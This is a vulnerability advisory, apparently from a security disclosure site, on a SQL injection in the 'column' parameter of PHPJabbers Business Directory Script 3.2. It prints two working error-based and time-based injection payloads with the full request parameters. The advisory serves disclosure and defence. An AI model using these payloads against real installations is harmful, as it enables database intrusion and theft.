Business Directory Script 3.2 SQL Injection

2023.08.26
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

## Title: Business-Directory-Script-3.2 SQLi ## Author: nu11secur1ty ## Date: 08/25/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/business-directory-script/#sectionDemo ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `column` parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the column parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Additionally, the payload (select*from(select(sleep(20)))a) was submitted in the column parameter. The application took 20271 milliseconds to respond to the request, compared with 230 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The attacker can steal all information from the database of the server of this application! STATUS: HIGH-CRITICAL Vulnerability [+]Payload: ```mysql --- Parameter: column (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: controller=pjAdminListings&action=pjActionGetListing&column=(UPDATEXML(2242,CONCAT(0x2e,0x716a767a71,(SELECT (ELT(2242=2242,1))),0x7178787671),5199))&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id= Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: controller=pjAdminListings&action=pjActionGetListing&column=(SELECT 6261 FROM (SELECT(SLEEP(15)))CMYC)&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Business-Directory-Script-Version%3A3.2/SQLi) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/08/business-directory-script-version32-sqli.html) ## Time spend: 01:35:00


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top